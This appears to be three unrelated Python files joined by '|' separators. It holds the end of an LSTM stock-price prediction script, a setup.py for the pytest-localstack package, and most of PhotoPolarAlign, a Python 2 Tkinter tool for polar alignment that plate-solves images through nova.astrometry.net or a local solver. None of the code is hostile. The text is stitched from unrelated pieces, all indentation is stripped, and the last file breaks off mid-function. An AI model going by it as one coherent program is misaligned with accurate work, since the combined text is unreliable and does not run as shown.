mcp = ModelCheckpoint(filepath='weights.h5', monitor='val_loss', verbose=1, save_best_only=True, save_weights_only=True)
tb = TensorBoard('logs')
history = regressor.fit(X_train, y_train, epochs=100,
callbacks=[es, rlr,mcp, tb], validation_split=0.2, verbose=1, batch_size=64)
#Predictions
#get real stock price of 2017
#dataset_test = pd.read_csv('data/Google_Stock_Price_Test.csv')
dataset_test = data_2.iloc[2227:, 0:4]
real_stock_price = dataset_test.iloc[:, 0:1].values
#get predictions on 2017
#dataset_total = pd.concat((dataset_train, dataset_test), axis = 0)
data_2 = data_2.iloc[:, 0:4]
inputs = data_2[len(data_2)-len(dataset_test) - n_past:].values
#inputs = inputs.as_matrix()
#inputs = inputs.reshape(-1,1)
inputs_scaled = sc.transform(inputs)
#data_test = dataset_test.values
#data_test_scaled = sc.transform(data_test)
X_test = []
for i in range(n_past, len(inputs)):
X_test.append(inputs_scaled[i-n_past:i, 0:4])
X_test = np.array(X_test)
#X_test = X_test.as_matrix()
#X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
predicted_stock_price = regressor.predict(X_test)
predicted_stock_price = sc_predict.inverse_transform(predicted_stock_price)
import math
from sklearn.metrics import mean_squared_error
rmse = math.sqrt(mean_squared_error(real_stock_price, predicted_stock_price))
#Visualising the result
plt.plot(real_stock_price, color = 'red', label= 'Real Google Stock Price')
plt.plot(predicted_stock_price, color = 'blue', label = 'Predicted Google Stock Price')
plt.title('Google Stock Price Prediction')
plt.xlabel('Time')
plt.ylabel('Google Stock Price')
plt.legend()
plt.show()
hfm, = plt.plot(sc_predict.inverse_transform(y_train), 'r', label='actual_training_stock_price')
hfm2, = plt.plot(sc_predict.inverse_transform(regressor.predict(X_train)),'b', label = 'predicted_training_stock_price')
plt.legend(handles=[hfm,hfm2])
plt.title('Predictions vs Actual Price')
plt.xlabel('Sample index')
plt.ylabel('Stock Price Training')
plt.savefig('graph_training.png', bbox_inches='tight')
plt.show()
plt.close() |
#!/usr/bin/env python
import io
import os
import sys
from setuptools import find_packages, setup
from setuptools.command.test import test as TestCommand
# Dependencies for this Python library.
REQUIRES = [
"botocore>=1.4.31,!=1.4.45",
'contextlib2; python_version < "3.3"',
"docker",
'mock; python_version < "3.3"',
"pluggy>=0.6.0",
"pytest>=3.3.0", # need caplog (+ warnings for tests)
"six",
]
# Dependencies to run the tests for this Python library.
TEST_REQUIREMENTS = ["boto3", "hypothesis"]
HERE = os.path.dirname(os.path.abspath(__file__))
def setup_package():
with io.open(
os.path.join(HERE, "pytest_localstack", "_version.py"), "r", encoding="utf8"
) as f:
about = {}
exec(f.read(), about)
with io.open(os.path.join(HERE, "README.rst"), "r", encoding="utf8") as f:
readme = f.read()
with io.open(os.path.join(HERE, "CHANGELOG.rst"), "r", encoding="utf8") as f:
changes = f.read()
setup(
name=about["__title__"],
version=about["__version__"],
description=about["__summary__"],
long_description=readme + u"\n\n" + changes,
author=about["__author__"],
author_email=about["__author_email__"],
license="MIT",
url=about["__uri__"],
packages=find_packages(where=HERE, exclude=["tests*"]),
py_modules=["pytest_localstack"],
install_requires=REQUIRES,
tests_require=TEST_REQUIREMENTS,
extras_require={"test": TEST_REQUIREMENTS},
cmdclass={"test": PyTest},
zip_safe=True,
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: Pytest",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX",
"Operating System :: Unix",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Testing",
"Topic :: Utilities",
],
entry_points={"pytest11": ["localstack = pytest_localstack"]},
)
class PyTest(TestCommand):
"""Setup the py.test test runner."""
def finalize_options(self):
"""Set options for the command line."""
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
"""Execute the test runner command."""
import pytest
sys.exit(pytest.main(self.test_args))
if __name__ == "__main__":
setup_package()
|
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 12 22:40:05 2014
@author: Themos Tsikas, Jack Richmond
"""
import sys
import time
class RequestError(Exception):
'''
An exception that happens when talking to the plate solver
'''
pass
def json2python(json):
'''
translates JSON to python
'''
import ujson
try:
return ujson.loads(json)
except:
pass
return None
def python2json(pyd):
'''
translates python to JSON
'''
import ujson
return ujson.dumps(pyd)
class NovaClient(object):
'''
nova.astrometry.net client
'''
default_url = 'http://nova.astrometry.net/api/'
def __init__(self, apiurl=default_url):
self.session = None
self.apiurl = apiurl
def get_url(self, service):
'''
constructs URL for a plate-solver service
'''
return self.apiurl + service
def send_request(self, service, args={}, file_args=None):
'''
service: string
args: dict
'''
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.encoders import encode_noop
from urllib2 import urlopen
from urllib2 import Request
from urllib2 import HTTPError
from urllib import urlencode
from email.mime.application import MIMEApplication
if self.session is not None:
args.update({'session': self.session})
# print 'Python:', (args)
json = python2json(args)
# print 'Sending json:', json
url = self.get_url(service)
print 'Sending to URL:', url
# If we're sending a file, format a multipart/form-data
if file_args is not None:
ma1 = MIMEBase('text', 'plain')
ma1.add_header('Content-disposition',
'form-data; name="request-json"')
ma1.set_payload(json)
ma2 = MIMEApplication(file_args[1], 'octet-stream', encode_noop)
ma2.add_header('Content-disposition',
'form-data; name="file"; filename="%s"'
% file_args[0])
# msg.add_header('Content-Disposition', 'attachment',
# filename='bud.gif')
# msg.add_header('Content-Disposition', 'attachment',
# filename=('iso-8859-1', '', 'FuSballer.ppt'))
mpa = MIMEMultipart('form-data', None, [ma1, ma2])
# Makie a custom generator to format it the way we need.
from cStringIO import StringIO
from email.generator import Generator
class MyGenerator(Generator):
'''
not sure why we need this, copied from nova's example code
'''
def __init__(self, fp, root=True):
Generator.__init__(self, fp, mangle_from_=False,
maxheaderlen=0)
self.root = root
def _write_headers(self, msg):
# We don't want to write the top-level headers;
# they go into Request(headers) instead.
if self.root:
return
# We need to use \r\n line-terminator, but Generator
# doesn't provide the flexibility to override, so we
# have to copy-n-paste-n-modify.
for hoo, voo in msg.items():
print >> self._fp, ('%s: %s\r\n' % (hoo, voo)),
# A blank line always separates headers from body
print >> self._fp, '\r\n',
# The _write_multipart method calls "clone" for the
# subparts. We hijack that, setting root=False
def clone(self, fp):
return MyGenerator(fp, root=False)
fpo = StringIO()
gen = MyGenerator(fpo)
gen.flatten(mpa)
data = fpo.getvalue()
headers = {'Content-type': mpa.get('Content-type')}
else:
# Else send x-www-form-encoded
data = {'request-json': json}
# print 'Sending form data:', data
data = urlencode(data)
# print 'Sending data:', data
headers = {}
request = Request(url=url, headers=headers, data=data)
try:
fle = urlopen(request)
txt = fle.read()
# DEBUG print 'Got json:', txt
result = json2python(txt)
# DEBUG print 'Got result:', result
stat = result.get('status')
# DEBUG print 'Got status:', stat
if stat == 'error':
errstr = result.get('errormessage', '(none)')
raise RequestError('server error message: ' + errstr)
return result
except HTTPError, err:
print 'HTTPError', err
txt = err.read()
open('err.html', 'wb').write(txt)
print 'Wrote error text to err.html'
def login(self, apikey):
'''
Logs us into the plate-solver and gets a session key
'''
import string
args = {'apikey': string.strip(apikey)}
result = self.send_request('login', args)
sess = result.get('session')
print 'Got session:', sess
if not sess:
raise RequestError('no session in result')
self.session = sess
def _get_upload_args(self, **kwargs):
'''
returns the specified solving options
'''
args = {}
lkdt = [('allow_commercial_use', 'd', str),
('allow_modifications', 'd', str),
('publicly_visible', 'y', str),
('scale_units', None, str),
('scale_type', None, str),
('scale_lower', None, float),
('scale_upper', None, float),
('scale_est', None, float),
('scale_err', None, float),
('center_ra', None, float),
('center_dec', None, float),
('radius', None, float),
('downsample_factor', None, int),
('tweak_order', None, int),
('crpix_center', None, bool), ]
for key, default, typ in lkdt:
# image_width, image_height
if key in kwargs:
val = kwargs.pop(key)
val = typ(val)
args.update({key: val})
elif default is not None:
args.update({key: default})
# print 'Upload args:', args
return args
def upload(self, fne, **kwargs):
'''
uploads an image file
'''
args = self._get_upload_args(**kwargs)
try:
fle = open(fne, 'rb')
result = self.send_request('upload', args, (fne, fle.read()))
return result
except IOError:
print 'File %s does not exist' % fne
raise
def myjobs(self):
'''
queries server for our jobs
'''
result = self.send_request('myjobs/')
return result['jobs']
def job_status(self, job_id, justdict=False):
'''
queries server to see if a job is finished
'''
result = self.send_request('jobs/%s' % job_id)
if justdict:
return result
stat = result.get('status')
if stat == 'success':
return stat
return stat
def sub_status(self, sub_id, justdict=False):
'''
queries server for submission status
'''
result = self.send_request('submissions/%s' % sub_id)
if justdict:
return result
return result.get('status')
def jobs_by_tag(self, tag, exact):
'''
not sure what that does
'''
from urllib import quote
exact_option = 'exact=yes' if exact else ''
result = self.send_request('jobs_by_tag?query=%s&%s'
% (quote(tag.strip()), exact_option), {}, )
return result
def stat_bar(self, txt):
'''
Update the Status bar
'''
self.stat_msg = txt
self.wstat.config(text=self.stat_msg)
self.wstat.update()
def limg2wcs(self, filename, wcsfn, hint):
import os
import time
t_start = time.time()
if (('OSTYPE' in os.environ and os.environ['OSTYPE']=='linux') or
(os.uname()[0]=='Linux') or
('OSTYPE' in os.environ and os.environ['OSTYPE']=='darwin') or
('OS' in os.environ and os.environ['OS'] =='Windows_NT')):
# Cygwin local or Linux local
if True:
# first rough estimate of scale
print '___________________________________________________________'
cmd = 'solve-field -b ' + self.local_configfile.get()
if self.havescale and self.restrict_scale.get()==1:
up_lim = self.scale*1.05
lo_lim = self.scale*0.95
cmd = cmd + (' -u app -L %.2f -H %.2f ' % (lo_lim, up_lim))
else:
cmd = cmd + ' -u ' + self.local_scale_units.get()
cmd = cmd + (' -L %.2f' % self.local_scale_low.get())
cmd = cmd + (' -H %.2f' % self.local_scale_hi.get())
if self.local_downscale.get() != 1:
cmd = cmd + (' -z %d' % self.local_downscale.get())
cmd = cmd + ' ' + self.local_xtra.get()
cmd = cmd + ' -O '
cmd = cmd + ' \\"%s\\"'
template = ((self.local_shell.get() % cmd))
# print template
cmd = (template % filename)
print cmd
os.system(cmd)
self.update_scale(hint)
print '___________________________________________________________'
self.update_solved_labels(hint, 'active')
stat_bar(self, 'Idle')
print 'local solve time ' + str(time.time()-t_start)
print '___________________________________________________________'
def img2wcs(self, ankey, filename, wcsfn, hint):
'''
Plate solves one image
'''
import optparse
import time
from urllib2 import urlopen
t_start = time.time()
parser = optparse.OptionParser()
parser.add_option('--server', dest='server',
default=NovaClient.default_url,
help='Set server base URL (eg, %default)')
parser.add_option('--apikey', '-k', dest='apikey',
help='API key for Astrometry.net web service; if not' +
'given will check AN_API_KEY environment variable')
parser.add_option('--upload', '-u', dest='upload', help='Upload a file')
parser.add_option('--wait', '-w', dest='wait', action='store_true',
help='After submitting, monitor job status')
parser.add_option('--wcs', dest='wcs',
help='Download resulting wcs.fits file, saving to ' +
'given filename; implies --wait if --urlupload or' +
'--upload')
parser.add_option('--kmz', dest='kmz',
help='Download resulting kmz file, saving to given ' +
'filename; implies --wait if --urlupload or --upload')
parser.add_option('--urlupload', '-U', dest='upload_url',
help='Upload a file at specified url')
parser.add_option('--scale-units', dest='scale_units',
choices=('arcsecperpix', 'arcminwidth', 'degwidth',
'focalmm'),
help='Units for scale estimate')
parser.add_option('--scale-lower', dest='scale_lower', type=float,
help='Scale lower-bound')
parser.add_option('--scale-upper', dest='scale_upper', type=float,
help='Scale upper-bound')
parser.add_option('--scale-est', dest='scale_est', type=float,
help='Scale estimate')
parser.add_option('--scale-err', dest='scale_err', type=float,
help='Scale estimate error (in PERCENT), eg "10" if' +
'you estimate can be off by 10%')
parser.add_option('--ra', dest='center_ra', type=float, help='RA center')
parser.add_option('--dec', dest='center_dec', type=float,
help='Dec center')
parser.add_option('--radius', dest='radius', type=float,
help='Search radius around RA,Dec center')
parser.add_option('--downsample', dest='downsample_factor', type=int,
help='Downsample image by this factor')
parser.add_option('--parity', dest='parity', choices=('0', '1'),
help='Parity (flip) of image')
parser.add_option('--tweak-order', dest='tweak_order', type=int,
help='SIP distortion order (default: 2)')
parser.add_option('--crpix-center', dest='crpix_center',
action='store_true', default=None,
help='Set reference point to center of image?')
parser.add_option('--sdss', dest='sdss_wcs', nargs=2,
help='Plot SDSS image for the given WCS file; write ' +
'plot to given PNG filename')
parser.add_option('--galex', dest='galex_wcs', nargs=2,
help='Plot GALEX image for the given WCS file; write' +
'plot to given PNG filename')
parser.add_option('--substatus', '-s', dest='sub_id',
help='Get status of a submission')
parser.add_option('--jobstatus', '-j', dest='job_id',
help='Get status of a job')
parser.add_option('--jobs', '-J', dest='myjobs', action='store_true',
help='Get all my jobs')
parser.add_option('--jobsbyexacttag', '-T', dest='jobs_by_exact_tag',
help='Get a list of jobs associated with a given' +
'tag--exact match')
parser.add_option('--jobsbytag', '-t', dest='jobs_by_tag',
help='Get a list of jobs associated with a given tag')
parser.add_option('--private', '-p', dest='public', action='store_const',
const='n', default='y',
help='Hide this submission from other users')
parser.add_option('--allow_mod_sa', '-m', dest='allow_mod',
action='store_const', const='sa', default='d',
help='Select license to allow derivative works of ' +
'submission, but only if shared under same conditions ' +
'of original license')
parser.add_option('--no_mod', '-M', dest='allow_mod', action='store_const',
const='n', default='d',
help='Select license to disallow derivative works of ' +
'submission')
parser.add_option('--no_commercial', '-c', dest='allow_commercial',
action='store_const', const='n', default='d',
help='Select license to disallow commercial use of' +
' submission')
# load opt with defaults, as above
opt, args = parser.parse_args([''.split()])
# add given arguments
opt.wcs = wcsfn
opt.apikey = ankey
opt.upload = filename
if self.havescale and self.restrict_scale.get() == 1:
opt.scale_units = 'arcsecperpix'
opt.scale_est = ('%.2f' % self.scale)
opt.scale_err = 5
# DEBUG print opt
print 'with estimated scale', opt.scale_est
args = {}
args['apiurl'] = opt.server
clnt = NovaClient(**args)
try:
clnt.login(opt.apikey)
except RequestError, URLError:
stat_bar(self, ("Couldn't log on to nova.astrometry.net " +
'- Check the API key'))
return
if opt.upload or opt.upload_url:
if opt.wcs or opt.kmz:
opt.wait = True
kwargs = dict()
if opt.scale_lower and opt.scale_upper:
kwargs.update(scale_lower=opt.scale_lower,
scale_upper=opt.scale_upper,
scale_type='ul')
elif opt.scale_est and opt.scale_err:
kwargs.update(scale_est=opt.scale_est,
scale_err=opt.scale_err,
scale_type='ev')
elif opt.scale_lower or opt.scale_upper:
kwargs.update(scale_type='ul')
if opt.scale_lower:
kwargs.update(scale_lower=opt.scale_lower)
if opt.scale_upper:
kwargs.update(scale_upper=opt.scale_upper)
for key in ['scale_units', 'center_ra', 'center_dec', 'radius',
'downsample_factor', 'tweak_order', 'crpix_center', ]:
if getattr(opt, key) is not None:
kwargs[key] = getattr(opt, key)
if opt.parity is not None:
kwargs.update(parity=int(opt.parity))
if opt.upload:
upres = clnt.upload(opt.upload, **kwargs)
stat = upres['status']
if stat != 'success':
print 'Upload failed: status', stat
print upres
sys.exit(-1)
opt.sub_id = upres['subid']
if opt.wait:
if opt.job_id is None:
if opt.sub_id is None:
print "Can't --wait without a submission id or job id!"
sys.exit(-1)
while True:
stat = clnt.sub_status(opt.sub_id, justdict=True)
# print 'Got status:', stat
jobs = stat.get('jobs', [])
if len(jobs):
for j in jobs:
if j is not None:
break
if j is not None:
print 'Selecting job id', j
opt.job_id = j
break
time.sleep(5)
success = False
while True:
stat = clnt.job_status(opt.job_id, justdict=True)
# print 'Got job status:', stat
# TODO : stat may be None! should recover
if stat.get('status', '') in ['success']:
success = (stat['status'] == 'success')
break
time.sleep(5)
if success:
clnt.job_status(opt.job_id)
retrieveurls = []
if opt.wcs:
# We don't need the API for this, just construct URL
url = opt.server.replace('/api/', '/wcs_file/%i' % opt.job_id)
retrieveurls.append((url, opt.wcs))
for url, fne in retrieveurls:
print 'Retrieving file from', url
fle = urlopen(url)
txt = fle.read()
wfl = open(fne, 'wb')
wfl.write(txt)
wfl.close()
print 'Wrote to', fne
self.update_solved_labels(hint, 'active')
stat_bar(self,'Idle')
print 'nova solve time ' + str(time.time()-t_start)
print '___________________________________________________________'
opt.job_id = None
opt.sub_id = None
if opt.sub_id:
print clnt.sub_status(opt.sub_id)
if opt.job_id:
print clnt.job_status(opt.job_id)
if opt.jobs_by_tag:
tag = opt.jobs_by_tag
print clnt.jobs_by_tag(tag, None)
if opt.jobs_by_exact_tag:
tag = opt.jobs_by_exact_tag
print clnt.jobs_by_tag(tag, 'yes')
if opt.myjobs:
jobs = clnt.myjobs()
print jobs
from Tkinter import Frame, Tk, Menu, Label, Entry, PhotoImage
from Tkinter import Scrollbar, Toplevel, Canvas, Radiobutton
from Tkinter import StringVar, IntVar, DoubleVar
from Tkinter import Button, LabelFrame, Checkbutton, Scale
from Tkinter import HORIZONTAL
def help_f():
'''
Our help window
'''
import tkMessageBox
tkMessageBox.showinfo("Help", "Still to come...")
def about_f():
'''
our about window
'''
import tkMessageBox
tkMessageBox.showinfo('About',
'PhotoPolarAlign v1.0.4 \n' +
'Copyright © 2014 Themos Tsikas, ' +
'Jack Richmond')
def scale_frm_wcs(fn):
from astropy.io import fits
hdu = fits.open(fn)
head = hdu[0].header
return scale_frm_header(head)
def parity_frm_header(head):
'''
look in the plate-solution header for the parity information
'''
try:
# nova's wcs files have the parity in the comments
comments = head['COMMENT']
size = (len(comments))
for i in range(0, size):
if comments[i][0:6] == 'parity':
tkns = comments[i].split(' ')
return int(tkns[1])
except KeyError:
return 1
def scale_frm_header(head):
'''
look in the plate-solution header for the scale information
'''
try:
# nova's wcs files have the scale in the comments
comments = head['COMMENT']
size = (len(comments))
for i in range(0, size):
if comments[i][0:5] == 'scale':
tkns = comments[i].split(' ')
return float(tkns[1])
except KeyError:
try:
# AstroArt's wcs files have it CDELT1 (deg/pixel)
cdelt1 = abs(head['CDELT1'])
return float(cdelt1)*60.0*60.0
except KeyError:
return 1.0
def dec_frm_header(head):
'''
look in header for width and height of image
'''
# nova's and AstroArt's wcs files have CRVAL2
dec = head['CRVAL2']
return dec
def wid_hei_frm_header(head):
'''
look in header for width and height of image
'''
try:
# nova's wcs files have IMAGEW / IMAGEH
width = head['IMAGEW']
height = head['IMAGEH']
return width, height
except KeyError:
try:
# AstroArt's fits files have NAXIS1 / NAXIS2
width = head['NAXIS1']
height = head['NAXIS2']
return width, height
except KeyError:
return 0, 0
def decdeg2dms(dd):
mnt,sec = divmod(dd*3600,60)
deg,mnt = divmod(mnt,60)
return deg,mnt,sec
def cross(crd, img, colour):
'''
Annotate with a cross for the RA axis
'''
from PIL import ImageDraw
draw = ImageDraw.Draw(img)
coords = crd[0]
ax1 = coords[0]
ay1 = coords[1]
draw.line((ax1 - 30, ay1 - 30) + (ax1 + 30, ay1 + 30),
fill=colour, width=3)
draw.line((ax1 + 30, ay1 - 30) + (ax1 - 30, ay1 + 30),
fill=colour, width=3)
def circle(centre, img, colour, name):
'''
Annotate with a circle
'''
from PIL import ImageFont, ImageDraw
font = ImageFont.load('symb24.pil')
draw = ImageDraw.Draw(img)
cen = centre[0]
ax1 = cen[0]
ay1 = cen[1]
draw.ellipse((ax1 - 20, ay1 - 20, ax1 + 20, ay1 + 20),
fill=None, outline=colour)
draw.text((ax1 + 30, ay1), name, fill=colour, font=font)
def cpcircle(centre, img, scl):
'''
Annotate with target circles
'''
from PIL import ImageFont, ImageDraw
font = ImageFont.load('helvR24.pil')
draw = ImageDraw.Draw(img)
cen = centre[0]
ax1 = cen[0]
ay1 = cen[1]
number = [5, 10, 20, 40]
for i in number:
rad = (i*60)/scl
draw.ellipse((ax1 - rad, ay1 - rad, ax1 + rad, ay1 + rad),
fill=None, outline='Green')
draw.text((ax1 + (rad*26)/36, ay1 + (rad*26/36)), str(i),
font=font)
draw.line((ax1 - 30, ay1) + (ax1 - 4, ay1), fill='Green', width=2)
draw.line((ax1 +4, ay1) + (ax1 + 30, ay1), fill='Green', width=2)
draw.line((ax1, ay1 - 30) + (ax1, ay1 - 4),fill='Green', width=2)
draw.line((ax1, ay1 + 4) + (ax1, ay1 + 30),fill='Green', width=2)
class PhotoPolarAlign(Frame):
'''
Our application as a class
'''
def write_config_file(self):
'''
Update the user preferences file
'''
# the API key
if not self.config.has_section('nova'):
self.config.add_section('nova')
self.config.set('nova', 'apikey', self.apikey.get())
# the image directory
if not self.config.has_section('file'):
self.config.add_section('file')
self.config.set('file', 'imgdir', self.imgdir)
# the geometry
if not self.config.has_section('appearance'):
self.config.add_section('appearance')
self.config.set('appearance', 'geometry',
self.myparent.winfo_geometry())
# the operating options
if not self.config.has_section('operations'):
self.config.add_section('operations')
self.config.set('operations','restrict scale',
self.restrict_scale.get())
# the local solve options
if not self.config.has_section('local'):
self.config.add_section('local')
self.config.set('local','shell',
self.local_shell.get())
self.config.set('local','downscale',
self.local_downscale.get())
self.config.set('local','configfile',
self.local_configfile.get())
self.config.set('local','scale_units',
self.local_scale_units.get())
self.config.set('local','scale_low',
self.local_scale_low.get())
self.config.set('local','scale_hi',
self.local_scale_hi.get())
self.config.set('local','xtra',
self.local_xtra.get())
#
with open(self.cfgfn, 'w') as cfgfile:
self.config.write(cfgfile)
cfgfile.close()
def settings_destroy(self):
'''
User asked to close the Settings
'''
self.write_config_file()
self.wvar4.configure(text=('%.3s...........' % self.apikey.get()))
self.settings_win.destroy()
def settings_open(self):
'''
Our Settings window
'''
# create child window
win = Toplevel()
self.settings_win = win
win.geometry('480x600')
win.title('Settings')
# get the API key information
frm = LabelFrame(win, borderwidth=2, relief='ridge', text='nova.astrometry.net')
frm.pack(side='top', ipadx=20, padx=20, fill='x')
nxt = Label(frm, text='API Key')
nxt.grid(row=0, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.apikey)
nxt.grid(row=0, column=1, pady=4)
nxt = Label(frm, text='Restrict scale')
nxt.grid(row=1, column=0, pady=4, sticky='w')
nxt = Checkbutton(frm, var=self.restrict_scale)
nxt.grid(row=1, column=1, pady=4)
frm = LabelFrame(win, borderwidth=2, relief='ridge', text='Local solver Configuration')
frm.pack(side='top', ipadx=20, padx=20, fill='x')
nxt = Label(frm, text='shell')
nxt.grid(row=0, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.local_shell,width=0)
nxt.grid(row=0, column=1, pady=4, sticky='we', columnspan=2)
ifrm = Frame(frm,bd=0)
ifrm.grid(row=1, column=0, pady=4, sticky='w', columnspan=3)
nxt = Label(ifrm, text='downscale')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_downscale,value='1',text='1')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_downscale,value='2',text='2')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_downscale,value='4',text='4')
nxt.pack(side='left')
nxt = Label(frm, text='configfile')
nxt.grid(row=2, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.local_configfile, width=0)
nxt.grid(row=2, column=1, pady=4,sticky='we', columnspan=2)
ifrm = Frame(frm,bd=0)
ifrm.grid(row=3, column=0, pady=4, sticky='w', columnspan=3)
nxt = Label(ifrm, text='scale_units')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_scale_units,value='arcsecperpix',text='arcsec/pix')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_scale_units,value='degwidth',text='degrees width')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_scale_units,value='arcminwidth',text='arcminutes width')
nxt.pack(side='left')
nxt = Label(frm, text='scale_low')
nxt.grid(row=4, column=0, pady=4, sticky='w')
nxt = Scale(frm, from_=0, to_=40, orient=HORIZONTAL,
variable=self.local_scale_low, showvalue=0, digits=4,
sliderlength=10, length=300, resolution=0.1)
nxt.grid(row=4, column=1, pady=4)
nxt = Entry(frm, textvariable=self.local_scale_low, width=8)
nxt.grid(row=4, column=2, pady=4)
nxt = Label(frm, text='scale_hi')
nxt.grid(row=5, column=0, pady=4, sticky='w')
nxt = Scale(frm, from_=0, to_=120, orient=HORIZONTAL,
variable=self.local_scale_hi, showvalue=0, digits=4,
sliderlength=10, length=300, resolution=0.1)
nxt.grid(row=5, column=1, pady=4)
nxt = Entry(frm, textvariable=self.local_scale_hi, width=8)
nxt.grid(row=5, column=2, pady=4)
nxt = Label(frm, text='extra')
nxt.grid(row=6, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.local_xtra, width=40)
nxt.grid(row=6, column=1, pady=4, sticky='we', columnspan=2)
nxt = Button(frm, text='Read from AstroTortilla configuration',
command=self.slurpAT)
nxt.grid(row=7, column=0, pady=4, sticky='we', columnspan=3)
Button(win, text='OK', command=self.settings_destroy).pack(pady=4)
def quit_method(self):
'''
User wants to quit
'''
self.write_config_file()
self.myparent.destroy()
def happy_with(self, wcs, img):
'''
check that .wcs (wcs) is compatible with .jpg (img)
'''
import os
from os.path import exists
if exists(wcs):
# DBG print wcs, 'exists'
# check timestamps
# DBG print os.stat(wcs).st_atime, os.stat(wcs).st_mtime, os.stat(wcs).st_ctime, 'wcs'
# DBG print os.stat(img).st_atime, os.stat(img).st_mtime, os.stat(img).st_ctime, 'img'
if os.stat(wcs).st_mtime> os.stat(img).st_mtime:
return True
return False
def get_file(self, hint):
'''
User wants to select an image file
'''
import tkFileDialog
from os.path import splitext, dirname, basename
options = {}
options['filetypes'] = [('JPEG files', '.jpg .jpeg .JPG .JPEG'),
('all files', '.*')]
options['initialdir'] = self.imgdir
titles = {}
titles['v'] = 'The vertical image of the Celestial Pole region'
titles['h'] = 'The horizontal image of the Celestial Pole region'
titles['i'] = 'The horizontal image after Alt/Az adjustment'
options['title'] = titles[hint]
img = tkFileDialog.askopenfilename(**options)
if img:
wcs = splitext(img)[0] + '.wcs'
if self.happy_with(wcs, img):
self.update_solved_labels(hint, 'active')
else:
self.update_solved_labels(hint, 'disabled')
self.imgdir = dirname(img)
if hint == 'v':
self.vimg_fn = img
self.vwcs_fn = wcs
self.havev = True
self.wvar1.configure(text=basename(img))
self.wvfn.configure(bg='green', activebackground='green')
elif hint == 'h':
self.himg_fn = img
self.hwcs_fn = wcs
self.haveh = True
self.wvar2.configure(text=basename(img))
self.whfn.configure(bg='green', activebackground='green')
elif hint == 'i':
self.iimg_fn = img
self.iwcs_fn = wcs
self.havei = True
self.wvar3.configure(text=basename(img))
self.wifn.configure(bg='green', activebackground='green')
def update_scale(self, hint):
try:
if hint == 'v':
self.scale = scale_frm_wcs(self.vwcs_fn)
elif hint == 'h':
self.scale = scale_frm_wcs(self.hwcs_fn)
elif hint == 'i':
self.scale = scale_frm_wcs(self.iwcs_fn)
self.havescale = True
self.wvar5.configure(text=('%.2f' % self.scale))
except:
self.havescale = False
self.wvar5.configure(text='--.--')
return
def solve(self, hint, solver):
'''
Solve an image
'''
if hint == 'h' or hint == 'v':
if self.vimg_fn == self.himg_fn:
stat_bar(self, ('Image filenames coincide - Check the Image ' +
'filenames'))
return
if hint == 'h':
aimg = self.himg_fn
awcs = self.hwcs_fn
if hint == 'v':
aimg = self.vimg_fn
awcs = self.vwcs_fn
if hint == 'i':
aimg = self.iimg_fn
awcs = self.iwcs_fn
try:
open(aimg)
except IOError:
stat_bar(self, ("couldn't open the image - Check the Image " +
'filename' + aimg))
return
stat_bar(self, 'Solving image...')
if solver=='nova':
img2wcs(self, self.apikey.get(), aimg, awcs, hint)
if solver=='local':
limg2wcs(self, aimg, awcs, hint)
self.update_scale(hint)
def update_display(self, cpcrd, the_scale):
'''
update Computed displayed quantities
'''
import numpy
axis = self.axis
x1a = axis[0]
y1a = axis[1]
x2a = cpcrd[0][0]
y2a = cpcrd[0][1]
self.scale = the_scale
self.havescale = True
self.wvar5.configure(text=('%.2f' % the_scale))
self.wvar6.configure(text=str(int(x1a))+','+str(int(y1a)))
self.wvar7.configure(text=(str(int(x2a)) +',' + str(int(y2a))))
err = the_scale*numpy.sqrt((x1a-x2a)**2 + (y1a-y2a)**2)/60.0
self.wvar8.configure(text=('%.2f' % err))
if x2a > x1a:
inst = 'Right '
else:
inst = 'Left '
ddeg = abs(x2a - x1a)*the_scale/3600.0
inst = inst + ('%02d:%02d:%02d' % decdeg2dms(ddeg))
self.wvar9.configure(text=inst)
if y2a > y1a:
inst = inst + ' Down '
else:
inst = inst + ' Up '
ddeg = abs(y2a - y1a)*the_scale/3600.0
inst = inst + ('%02d:%02d:%02d' % decdeg2dms(ddeg))
self.wvar9.configure(text=inst)
def annotate_imp(self):
'''
Annotate the improvement image
'''
from PIL import Image
from astropy.time import Time
from astropy.coordinates import SkyCoord
from astropy.coordinates import FK5
from astropy.io import fits
from astropy import wcs
import numpy
from os.path import splitext
if self.iimg_fn == self.himg_fn:
stat_bar(self, ('Image filenames coincide - Check the Image ' +
'filenames'))
return
try:
imi = Image.open(self.iimg_fn)
# Load the FITS hdulist using astropy.io.fits
hdulisti = fits.open(self.iwcs_fn)
hdulisth = fits.open(self.hwcs_fn)
except IOError:
return
axis = self.axis
try:
axis[0]
except:
stat_bar(self,"don't know where Polar Axis is - Find Polar Axis")
return
stat_bar(self, 'Annotating...')
headi = hdulisti[0].header
headh = hdulisth[0].header
wcsi = wcs.WCS(headi)
now = Time.now()
if self.hemi == 'N':
cp = SkyCoord(ra=0, dec=90, frame='fk5', unit='deg', equinox=now)
else:
cp = SkyCoord(ra=0, dec=-90, frame='fk5', unit='deg', equinox=now)
cpj2000 = cp.transform_to(FK5(equinox='J2000'))
cpskycrd = numpy.array([[cpj2000.ra.deg, cpj2000.dec.deg]],
numpy.float_)
cpcrdi = wcsi.wcs_world2pix(cpskycrd, 1)
scalei = scale_frm_header(headi)
widthi, heighti = wid_hei_frm_header(headi)
if wid_hei_frm_header(headi) != wid_hei_frm_header(headh) :
